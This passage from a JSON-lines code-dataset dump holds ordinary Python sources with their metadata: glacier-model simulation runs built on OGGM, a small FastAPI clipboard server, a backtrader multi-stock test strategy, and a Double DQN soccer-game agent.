init_model_fls=tmp_mod.fls,\n climate_filename='climate_monthly',\n output_filesuffix='_histalp' + runsuffix,\n bias=mb_bias)\n except RuntimeError as err:\n if 'Glacier exceeds domain boundaries' in err.args[0]:\n log.info('(%s) histalp run exceeded domain bounds' % gdir.rgi_id)\n return\n else:\n raise RuntimeError('other error')\n\n ds1 = xr.open_dataset(gdir.get_filepath('model_diagnostics',\n filesuffix='_histalp' + runsuffix))\n ds2 = xr.open_dataset(gdir.get_filepath('model_diagnostics',\n filesuffix='_spinup'))\n # store mean temperature and precipitation\n yindex = np.arange(meta['first'], obs_ye+1)\n\n try:\n cm = xr.open_dataset(gdir.get_filepath('climate_monthly'))\n except FileNotFoundError:\n cm = xr.open_dataset(gdir.get_filepath('climate_monthly',\n filesuffix='_' + rgi_id))\n\n tmean = cm.temp.groupby('time.year').mean().loc[yindex].to_pandas()\n pmean = cm.prcp.groupby('time.year').mean().loc[yindex].to_pandas()\n\n rval = {'rgi_id': gdir.rgi_id, 'name': meta['name'],\n 'histalp': ds1.length_m.to_dataframe()['length_m'],\n 'spinup': ds2.length_m.to_dataframe()['length_m'],\n 'tbias': tbias, 'tmean': tmean, 'pmean': pmean}\n\n # relative length change\n rval['rel_dl'] = relative_length_change(meta, rval['spinup'],\n rval['histalp'])\n\n # if merged, store tributary flowline change as well\n if '_merged' in gdir.rgi_id:\n\n trib = rval['histalp'].copy() * np.nan\n\n # choose the correct flowline index, use model_fls as they have rgiids\n fls = gdir.read_pickle('model_flowlines')\n flix = np.where([fl.rgi_id != rgi_id for fl in fls])[0][-1]\n\n fmod = FileModel(gdir.get_filepath('model_run',\n filesuffix='_histalp' + runsuffix))\n assert fmod.fls[flix].nx == fls[flix].nx, ('filemodel and gdir '\n 'flowlines do not match')\n for yr in rval['histalp'].index:\n fmod.run_until(yr)\n trib.loc[yr] = fmod.fls[flix].length_m\n\n trib -= trib.iloc[0]\n rval['trib_dl'] = trib\n\n return rval\n\n\ndef multi_parameter_run(paramdict, gdirs, meta, obs, runid=None, runsuffix=''):\n # get us all parameters\n keys = paramdict.keys()\n values = paramdict.values()\n paramcombi = [dict(zip(keys, combination)) for\n combination in itertools.product(*values)]\n log.info('Multi parameter run with >>> %s <<< parameters started.' %\n len(paramcombi))\n\n # default glena\n default_glena = 2.4e-24\n\n # if a runid is passed, run only this item in the paramcombi\n # runids (= SLURM JOBID) start at 1 !\n if runid is not None:\n paramcombi = [paramcombi[runid-1]]\n\n # rval_dict is our output\n rval_dict = {}\n # TODO think of something nicer! NetCDF or a like\n\n # loop over all combinations\n for nr, combi in enumerate(paramcombi):\n\n # set all parameters\n for key, val in combi.items():\n\n # here we se cfg.PARAMS values\n if key == 'glena_factor':\n cfg.PARAMS['glen_a'] = val * default_glena\n cfg.PARAMS['inversion_glen_a'] = val * default_glena\n # set mass balance bias\n elif key == 'mbbias':\n mbbias = val\n elif key == 'prcp_scaling_factor':\n cfg.PARAMS['prcp_scaling_factor'] = val\n else:\n raise ValueError('Parameter not understood')\n\n if runid is not None:\n nr = runid-1\n\n log.info('Current parameter combination: %s' % str(combi))\n log.info('This is combination %d out of %d.' % (nr+1, len(paramcombi)))\n\n # ok, we need the ref_glaciers here for calibration\n # they should be initialiced so, just recreate them from the directory\n ref_gdirs = [GlacierDirectory(refid) for\n refid in preprocessing.ADDITIONAL_REFERENCE_GLACIERS]\n\n # do the mass balance calibration\n compute_ref_t_stars(ref_gdirs + gdirs)\n task_list = [tasks.local_t_star,\n tasks.mu_star_calibration,\n tasks.prepare_for_inversion,\n tasks.mass_conservation_inversion,\n tasks.filter_inversion_output,\n tasks.init_present_time_glacier\n ]\n for task in task_list:\n execute_entity_task(task, gdirs)\n\n # check for glaciers to merge:\n gdirs_merged = []\n gdirs2sim = gdirs.copy()\n for gid in meta.index:\n merg = merge_pair_dict(gid)\n if merg is not None:\n # main and tributary glacier\n gd2merge = [gd for gd in gdirs if gd.rgi_id in [gid] + merg[0]]\n\n # actual merge task\n log.warning('DeprecationWarning: If downloadlink is updated ' +\n 'to gdirs_v1.2, remove filename kwarg')\n gdir_merged = merge_glacier_tasks(gd2merge, gid,\n buffer=merg[1],\n filename='climate_monthly')\n\n # remove the entity glaciers from the simulation list\n gdirs2sim = [gd for gd in gdirs2sim if\n gd.rgi_id not in [gid] + merg[0]]\n\n # uncomment to visually inspect the merged glacier\n \"\"\"\n import matplotlib.pyplot as plt\n from oggm import graphics\n import os\n f, ax = plt.subplots(1, 1, figsize=(12, 12))\n graphics.plot_centerlines(gdir_merged,\n use_model_flowlines=True, ax=ax)\n f.savefig(os.path.join(cfg.PATHS['working_dir'], gid) + '.png')\n \"\"\"\n\n gdirs_merged.append(gdir_merged)\n\n # add merged glaciers to the left over entity glaciers\n gdirs2sim += gdirs_merged\n\n # do the actual simulations\n rval = execute_entity_task(spinup_plus_histalp,\n gdirs2sim, meta=meta,\n mb_bias=mbbias,\n runsuffix=runsuffix\n )\n # remove possible Nones\n rval = [rl for rl in rval if rl is not None]\n\n rval_dict[str(combi)] = rval\n\n return rval_dict\n\n\ndef run_ensemble(allgdirs, rgi_id, ensemble, tbiasdict, allmeta,\n storedir, runsuffix='', spinup_y0=1999):\n\n # default glena\n default_glena = 2.4e-24\n\n # loop over all combinations\n for nr, run in enumerate(ensemble):\n\n pdict = ast.literal_eval('{' + run + '}')\n cfg.PARAMS['glen_a'] = pdict['glena_factor'] * default_glena\n cfg.PARAMS['inversion_glen_a'] = pdict['glena_factor'] * default_glena\n mbbias = pdict['mbbias']\n cfg.PARAMS['prcp_scaling_factor'] = pdict['prcp_scaling_factor']\n\n log.info('Current parameter combination: %s' % str(run))\n log.info('This is combination %d out of %d.' % (nr+1, len(ensemble)))\n\n # ok, we need the ref_glaciers here for calibration\n # they should be initialiced so, just recreate them from the directory\n ref_gdirs = [GlacierDirectory(refid) for\n refid in preprocessing.ADDITIONAL_REFERENCE_GLACIERS]\n\n # do the mass balance calibration\n compute_ref_t_stars(ref_gdirs + allgdirs)\n task_list = [tasks.local_t_star,\n tasks.mu_star_calibration,\n tasks.prepare_for_inversion,\n tasks.mass_conservation_inversion,\n tasks.filter_inversion_output,\n tasks.init_present_time_glacier\n ]\n\n for task in task_list:\n execute_entity_task(task, allgdirs)\n\n # check for glaciers to merge:\n gdirs_merged = []\n gdirs2sim = allgdirs.copy()\n for gid in allmeta.index:\n merg = merge_pair_dict(gid)\n if merg is not None:\n # main and tributary glacier\n gd2merge = [gd for gd in allgdirs if gd.rgi_id in [gid] + merg[0]]\n\n # actual merge task\n log.warning('DeprecationWarning: If downloadlink is updated ' +\n 'to gdirs_v1.2, remove filename kwarg')\n gdir_merged = merge_glacier_tasks(gd2merge, gid,\n buffer=merg[1],\n filename='climate_monthly')\n\n # remove the entity glaciers from the simulation list\n gdirs2sim = [gd for gd in gdirs2sim if\n gd.rgi_id not in [gid] + merg[0]]\n\n gdirs_merged.append(gdir_merged)\n\n # add merged glaciers to the left over entity glaciers\n gdirs2sim += gdirs_merged\n\n # now only select the 1 glacier\n gdir = [gd for gd in gdirs2sim if gd.rgi_id == rgi_id][0]\n rgi_id0 = rgi_id.split('_')[0]\n meta = allmeta.loc[rgi_id0].copy()\n\n # do the actual simulations\n\n # spinup\n fls = gdir.read_pickle('model_flowlines')\n tbias = tbiasdict[run]\n mb = MultipleFlowlineMassBalance(gdir, fls=fls,\n mb_model_class=ConstantMassBalance,\n filename='climate_monthly',\n y0=spinup_y0,\n bias=mbbias)\n minimize_dl(tbias, mb, fls, None, None, gdir, False,\n runsuffix='_{:02d}'.format(nr))\n\n # histalp\n # --------- GET SPINUP STATE ---------------\n tmp_mod = FileModel(\n gdir.get_filepath('model_run',\n filesuffix='_spinup_{:02d}'.format(nr)))\n\n tmp_mod.run_until(tmp_mod.last_yr)\n\n # --------- HIST IT DOWN ---------------\n histrunsuffix = '_histalp{}_{:02d}'.format(runsuffix, nr)\n\n # now actual simulation\n run_from_climate_data(gdir, ys=meta['first'], ye=2014,\n init_model_fls=tmp_mod.fls,\n output_filesuffix=histrunsuffix,\n climate_filename='climate_monthly',\n bias=mbbias)\n\n # save the calibration parameter to the climate info file\n out = gdir.get_climate_info()\n out['ensemble_calibration'] = pdict\n gdir.write_json(out, 'climate_info')\n\n # copy stuff to storage\n basedir = os.path.join(storedir, rgi_id)\n ensdir = os.path.join(basedir, '{:02d}'.format(nr))\n mkdir(ensdir, reset=True)\n\n deep_path = os.path.join(ensdir, rgi_id[:8], rgi_id[:11], rgi_id)\n\n # copy whole GDir\n copy_to_basedir(gdir, base_dir=ensdir, setup='run')\n\n # copy run results\n fn1 = 'model_diagnostics_spinup_{:02d}.nc'.format(nr)\n shutil.copyfile(\n gdir.get_filepath('model_diagnostics',\n filesuffix='_spinup_{:02d}'.format(nr)),\n os.path.join(deep_path, fn1))\n\n fn2 = 'model_diagnostics{}.nc'.format(histrunsuffix)\n shutil.copyfile(\n gdir.get_filepath('model_diagnostics', filesuffix=histrunsuffix),\n os.path.join(deep_path, fn2))\n\n fn3 = 'model_run_spinup_{:02d}.nc'.format(nr)\n shutil.copyfile(\n gdir.get_filepath('model_run',\n filesuffix='_spinup_{:02d}'.format(nr)),\n os.path.join(deep_path, fn3))\n\n fn4 = 'model_run{}.nc'.format(histrunsuffix)\n shutil.copyfile(\n gdir.get_filepath('model_run', filesuffix=histrunsuffix),\n os.path.join(deep_path, fn4))\n\n log.warning('DeprecationWarning: If downloadlink is updated to ' +\n 'gdirs_v1.2 remove this copyfile:')\n # copy (old) climate monthly files which\n for fn in os.listdir(gdir.dir):\n if 'climate_monthly' in fn:\n shutil.copyfile(os.path.join(gdir.dir, fn),\n os.path.join(deep_path, fn))\n", "repo_name": "matthiasdusch/relic", "sub_path": "relic/histalp_runs.py", "file_name": "histalp_runs.py", "file_ext": "py", "file_size_in_byte": 14305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "relic.spinup.systematic_spinup", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 48, "usage_type": "call"}, {"api_name": "oggm.core.flowline.run_from_climate_data", "line_number": 54, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 66, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 74, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 76, "usage_type": "call"}, {"api_name": "relic.postprocessing.relative_length_change", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 98, "usage_type": "call"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 100, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 119, "usage_type": "call"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 143, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 143, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 144, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 144, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 149, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 149, "usage_type": "name"}, {"api_name": "oggm.GlacierDirectory", "line_number": 161, "usage_type": "call"}, {"api_name": "relic.preprocessing.ADDITIONAL_REFERENCE_GLACIERS", "line_number": 162, "usage_type": "attribute"}, {"api_name": "relic.preprocessing", "line_number": 162, "usage_type": "name"}, {"api_name": "oggm.core.climate.compute_ref_t_stars", "line_number": 165, "usage_type": "call"}, {"api_name": "oggm.tasks.local_t_star", "line_number": 166, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 166, "usage_type": "name"}, {"api_name": "oggm.tasks.mu_star_calibration", "line_number": 167, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 167, "usage_type": "name"}, {"api_name": "oggm.tasks.prepare_for_inversion", "line_number": 168, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 168, "usage_type": "name"}, {"api_name": "oggm.tasks.mass_conservation_inversion", "line_number": 169, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 169, "usage_type": "name"}, {"api_name": "oggm.tasks.filter_inversion_output", "line_number": 170, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 170, "usage_type": "name"}, {"api_name": "oggm.tasks.init_present_time_glacier", "line_number": 171, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 171, "usage_type": "name"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 174, "usage_type": "call"}, {"api_name": "relic.preprocessing.merge_pair_dict", "line_number": 180, "usage_type": "call"}, {"api_name": "oggm.workflow.merge_glacier_tasks", "line_number": 188, "usage_type": "call"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 213, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 235, "usage_type": "call"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 236, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 236, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 237, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 237, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 239, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 239, "usage_type": "name"}, {"api_name": "oggm.GlacierDirectory", "line_number": 246, "usage_type": "call"}, {"api_name": "relic.preprocessing.ADDITIONAL_REFERENCE_GLACIERS", "line_number": 247, "usage_type": "attribute"}, {"api_name": "relic.preprocessing", "line_number": 247, "usage_type": "name"}, {"api_name": "oggm.core.climate.compute_ref_t_stars", "line_number": 250, "usage_type": "call"}, {"api_name": "oggm.tasks.local_t_star", "line_number": 251, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 251, "usage_type": "name"}, {"api_name": "oggm.tasks.mu_star_calibration", "line_number": 252, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 252, "usage_type": "name"}, {"api_name": "oggm.tasks.prepare_for_inversion", "line_number": 253, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 253, "usage_type": "name"}, {"api_name": "oggm.tasks.mass_conservation_inversion", "line_number": 254, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 254, "usage_type": "name"}, {"api_name": "oggm.tasks.filter_inversion_output", "line_number": 255, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 255, "usage_type": "name"}, {"api_name": "oggm.tasks.init_present_time_glacier", "line_number": 256, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 256, "usage_type": "name"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 260, "usage_type": "call"}, {"api_name": "relic.preprocessing.merge_pair_dict", "line_number": 266, "usage_type": "call"}, {"api_name": "oggm.workflow.merge_glacier_tasks", "line_number": 274, "usage_type": "call"}, {"api_name": "oggm.core.massbalance.MultipleFlowlineMassBalance", "line_number": 297, "usage_type": "call"}, {"api_name": "oggm.core.massbalance.ConstantMassBalance", "line_number": 298, "usage_type": "name"}, {"api_name": "relic.spinup.minimize_dl", "line_number": 302, "usage_type": "call"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 307, "usage_type": "call"}, {"api_name": "oggm.core.flowline.run_from_climate_data", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path", "line_number": 330, "usage_type": "attribute"}, {"api_name": "oggm.utils.mkdir", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path", "line_number": 333, "usage_type": "attribute"}, {"api_name": "oggm.utils.copy_to_basedir", "line_number": 336, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path", "line_number": 354, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 364, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 367, "usage_type": "call"}, {"api_name": "os.path", "line_number": 367, "usage_type": "attribute"}]} +{"seq_id": "74018424513", "text": "from typing import Union\nfrom fastapi import FastAPI, Form\nimport os\n\napp = FastAPI()\n\n@app.get(\"/clipboard\")\ndef get_clipboard():\n\tcontent = \"\"\n\twith open('clipboard.txt',encoding='utf8') as f:\n\t\tcontent = f.read()\n\t\tf.close\n\tprint(\"from get_clipboard method():\")\n\tprint(content)\n\treturn content\n\n@app.post(\"/clipboard\")\nasync def set_clipboard(content: str = Form()):\n\tprint(\"server rev a post request\")\n\twith open(\"clipboard.txt\",\"w\",encoding='utf8') as f:\n\t\tf.write(content)\n\t\tf.close\n\treturn content\n", "repo_name": "lemonhall/clipboard", "sub_path": "server/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 5, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "12528450563", "text": "import logging\n\nimport backtrader as bt\nfrom backtrader.feeds import PandasData\n\nfrom mfm_learner.datasource import datasource_factory\nfrom mfm_learner.example.backtest.data_loader import comply_backtrader_data_format\nfrom mfm_learner.utils import utils\nimport numpy as np\nlogger = logging.getLogger(__name__)\n\n\nclass TestStrategy(bt.Strategy):\n\n def __init__(self):\n self.value_history=[]\n self.dataclose = self.datas[0].close\n print(\"stock names:\", [data._name for data in self.datas])\n\n # 订单状态通知,买入卖出都是下单\n def notify_order(self, order):\n pass\n\n # 交易状态通知,一买一卖算交易\n def notify_trade(self, trade):\n pass\n\n def next(self):\n # import pdb; pdb.set_trace()\n # print(self.datas[0]._name, self.datas[0].datetime.date(), self.datas[0].close[0])\n self.buy(self.datas[0], size=100) # 第一只股票\n self.buy(self.datas[1], size=50)\n self.buy(self.datas[2], size=10)\n self.value_history.append(self.broker.getvalue())\n print(\"今日总资产:\", self.broker.getvalue())\n print(\"总资产均值:\", np.array(self.value_history).mean())\n print(\"总资标准差:\", np.array(self.value_history).std())\n print(\"len:\", len(self.data), \",buflen:\", self.data.buflen())\n print(\"-\"*80)\n\n\n# python -m test.toy.test_multistocks_backtrader\nif __name__ == '__main__':\n utils.init_logger()\n\n start_date = '20200101'\n end_date = '20201201'\n datasource = datasource_factory.get()\n stocks = datasource.index_weight('000905.SH', start_date, end_date)\n stocks = stocks[:5]\n d_start_date = utils.str2date(start_date)\n d_end_date = utils.str2date(end_date)\n\n cerebro = bt.Cerebro()\n cerebro.broker.setcash(100000)\n cerebro.broker.setcommission(commission=0)\n cerebro.addstrategy(TestStrategy)\n\n # 想脑波cerebro逐个追加每只股票的数据\n for stock_code in stocks:\n df_stock = datasource.daily(stock_code, start_date, end_date)\n df_stock = comply_backtrader_data_format(df_stock)\n data = PandasData(dataname=df_stock, fromdate=d_start_date, todate=d_end_date, plot=False)\n cerebro.adddata(data, name=stock_code)\n logger.debug(\"初始化股票[%s]数据到脑波cerebro:%d 条\", stock_code, len(df_stock))\n\n cerebro.run(tradehistory=True)\n", "repo_name": "piginzoo/mfm_learner", "sub_path": "test/toy/test_multistocks_backtrader.py", "file_name": "test_multistocks_backtrader.py", "file_ext": "py", "file_size_in_byte": 2385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 70, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "backtrader.Strategy", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils.init_logger", "line_number": 44, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "mfm_learner.datasource.datasource_factory.get", "line_number": 48, "usage_type": "call"}, {"api_name": "mfm_learner.datasource.datasource_factory", "line_number": 48, "usage_type": "name"}, {"api_name": "mfm_learner.utils.utils.str2date", "line_number": 51, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 51, "usage_type": "name"}, {"api_name": "mfm_learner.utils.utils.str2date", "line_number": 52, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 52, "usage_type": "name"}, {"api_name": "backtrader.Cerebro", "line_number": 54, "usage_type": "call"}, {"api_name": "mfm_learner.example.backtest.data_loader.comply_backtrader_data_format", "line_number": 62, "usage_type": "call"}, {"api_name": "backtrader.feeds.PandasData", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "74097808834", "text": "import numpy as np\nimport math\nimport pandas as pd\nfrom config import Config\nimport os\n\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import placeholder, variable_scope, GraphKeys, get_variable, squared_difference, Session, get_collection, assign, global_variables_initializer, train\nfrom collections import deque\nfrom tensorflow.keras import models, layers, optimizers\nfrom agent import Agent\n\nconf = Config()\n\n# refernce from https://github.com/MorvanZhou\nclass AgentsDDQN(Agent):\n def __init__(self, id, N):\n self.id = id\n self.path = \"./model/DDQN/\" + str(N) + \"/\" + str(id)\n self.state = []\n self.next_state = []\n self.has_model = os.path.exists(self.path)\n # learning rate\n if self.has_model:\n self.greedy = 0.0001\n self.epsilon = 0.8\n else:\n # exploration strategy\n self.greedy = 0.001\n self.epsilon = 0.5\n # discount factor\n self.gamma = 0.9\n # number of features\n self.features = 7\n # number of actions\n self.actions = 16\n self.replace_target_iter = 1000\n self.memory_size = 50000\n self.epsilon_max = 0.9\n self.epsilon_increment = 0.001\n\n self.step_counter = 0\n self.memory = np.zeros((self.memory_size, self.features*2+2))\n self.build_network()\n\n self.sess = Session()\n self.batch_size = 64\n # tf.summary.FileWriter(\"logs/\", self.sess.graph)\n print(self.id, self.sess)\n self.saver = train.Saver()\n\n if not(os.path.exists(self.path)):\n self.sess.run(global_variables_initializer())\n else:\n self.load_model()\n self.cost_history = []\n \n def set_state(self, state):\n self.state = state\n # try to give up get_state in DQN, just use original state\n \n def build_network(self):\n tf.compat.v1.disable_eager_execution()\n # evaluate network\n self.s_eval = placeholder(tf.float32, [None, self.features], name='s')\n self.q_target = placeholder(tf.float32, [None, self.actions], name='Q_target')\n with variable_scope('eval_net' + str(self.id)) as scope:\n #scope.reuse_variables()\n c_names = ['eval_net_params' + str(self.id), GraphKeys.GLOBAL_VARIABLES]\n n_l1 = 100\n w_init = tf.random_normal_initializer(0.01)\n b_init = tf.constant_initializer(0.01)\n # first layer. collections is used later when assign to target net\n with variable_scope('l1'):\n w1 = get_variable('w1', [self.features, n_l1], initializer=w_init, collections=c_names)\n b1 = get_variable('b1', [1, n_l1], initializer=b_init, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(self.s_eval, w1) + b1)\n # second layer. collections is used later when assign to target net\n with variable_scope('l2'):\n w2 = get_variable('w2', [n_l1, self.actions], initializer=w_init, collections=c_names)\n b2 = get_variable('b2', [1, self.actions], initializer=b_init, collections=c_names)\n self.q_eval = tf.matmul(l1, w2) + b2\n with variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.math.squared_difference(self.q_target, self.q_eval))\n with variable_scope('train'):\n #self._train_op = tf.compat.v1.train.RMSPropOptimizer(self.alpha).minimize(self.loss)\n self._train_op = tf.compat.v1.train.AdagradOptimizer(self.greedy).minimize(self.loss)\n \n # target network\n self.s_target = placeholder(tf.float32, [None, self.features], name='s_') # input\n with variable_scope('target_net' + str(self.id)):\n # c_names(collections_names) are the collections to store variables\n c_names = ['target_net_params' + str(self.id), GraphKeys.GLOBAL_VARIABLES]\n\n # first layer. collections is used later when assign to target net\n with variable_scope('l1'):\n w1 = get_variable('w1', [self.features, n_l1], initializer=w_init, collections=c_names)\n b1 = get_variable('b1', [1, n_l1], initializer=b_init, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(self.s_target, w1) + b1)\n\n # second layer. collections is used later when assign to target net\n with variable_scope('l2'):\n w2 = get_variable('w2', [n_l1, self.actions], initializer=w_init, collections=c_names)\n b2 = get_variable('b2', [1, self.actions], initializer=b_init, collections=c_names)\n self.q_next = tf.matmul(l1, w2) + b2\n\n def store_transition(self, action, reward, state_new):\n if not hasattr(self, 'memory_counter'):\n self.memory_counter = 0\n action_number = action[0] - 1 + action[1] * 8\n transition = np.hstack((self.state, [action_number, reward], state_new))\n index = self.memory_counter % self.memory_size\n self.memory[index, :] = transition\n self.memory_counter += 1\n self.state = state_new\n\n def make_decision(self, no_random = False):\n # observation = observation[np.newaxis, :]\n observation = np.array(self.state).reshape([1, self.features])\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s_eval: observation})\n action = np.argmax(actions_value[0][:])\n action_0 = action % 8 + 1\n action_1 = math.floor(action / 8)\n\n if not hasattr(self, 'q'): # 记录选的 Qmax 值\n self.q = []\n self.running_q = 0\n self.running_q = self.running_q*0.99 + 0.01 * np.max(actions_value)\n self.q.append(self.running_q)\n \n if np.random.uniform() > self.epsilon and not(no_random):\n return self.make_random_decision()\n return [action_0, action_1]\n \n def make_random_decision(self):\n action_0 = np.random.randint(1, 9)\n action_1 = np.random.randint(0, 2)\n return [action_0, action_1]\n \n def replace_target_params(self):\n t_params = get_collection('target_net_params' + str(self.id))\n e_params = get_collection('eval_net_params' + str(self.id))\n self.sess.run([assign(t, e) for t, e in zip(t_params, e_params)])\n \n def update(self):\n # check to replace target parameters\n if self.step_counter % self.replace_target_iter == 0:\n self.replace_target_params()\n print('\\ntarget_params_replaced\\n')\n\n # sample batch memory from all memory\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter, size=self.batch_size)\n batch_memory = self.memory[sample_index, :]\n\n q_next, q_eval_for_next = self.sess.run(\n [self.q_next, self.q_eval],\n feed_dict={\n self.s_target: batch_memory[:, -self.features:], # next observation\n self.s_eval: batch_memory[:, -self.features:] # next observation\n })\n\n q_eval = self.sess.run(self.q_eval, {self.s_eval: batch_memory[:, :self.features]})\n # change q_target w.r.t q_eval's action\n q_target = q_eval.copy()\n\n batch_index = np.arange(self.batch_size, dtype=np.int32)\n eval_act_index = batch_memory[:, self.features].astype(int)\n reward = batch_memory[:, self.features + 1]\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * np.max(q_next, axis=1)\n\n max_act_for_next = np.argmax(q_eval_for_next, axis=1) # q_eval 得出的最高奖励动作\n selected_q_next = q_next[batch_index, max_act_for_next] # Double DQN 选择 q_next 依据 q_eval 选出的动作\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * selected_q_next\n\n # train eval network\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s_eval: batch_memory[:, :self.features],\n self.q_target: q_target})\n self.cost_history.append(self.cost)\n\n # increasing epsilon\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n\n self.step_counter += 1\n \n def plot_cost(self):\n import matplotlib.pyplot as plt\n plt.plot(np.arange(len(self.cost_history)), self.cost_history)\n plt.ylabel('Cost')\n plt.xlabel('training steps')\n plt.show()\n\n def update_greedy(self):\n self.greedy *= 0.95\n\n def load_model(self):\n self.saver.restore(self.sess, self.path)\n \n def plot_qvalue(self):\n import matplotlib.pyplot as plt\n plt.plot(np.array(self.q), label=self.id)\n plt.ylabel('Q eval')\n plt.xlabel('training steps')\n plt.grid()\n plt.show()\n\n def save_model(self, if_plot=False, postfix=''):\n try:\n self.saver.save(self.sess, self.path+postfix)\n print(self.path+postfix + ' saved successfully')\n np.save(self.path + postfix +\".npy\", self.memory)\n if if_plot:\n self.plot_cost()\n except:\n print('ERROR: can not save the model')", "repo_name": "JackXTY/Super-Soccer-Game", "sub_path": "DDQN.py", "file_name": "DDQN.py", "file_ext": "py", "file_size_in_byte": 9377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.Config", "line_number": 13, "usage_type": "call"}, {"api_name": "agent.Agent", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 43, 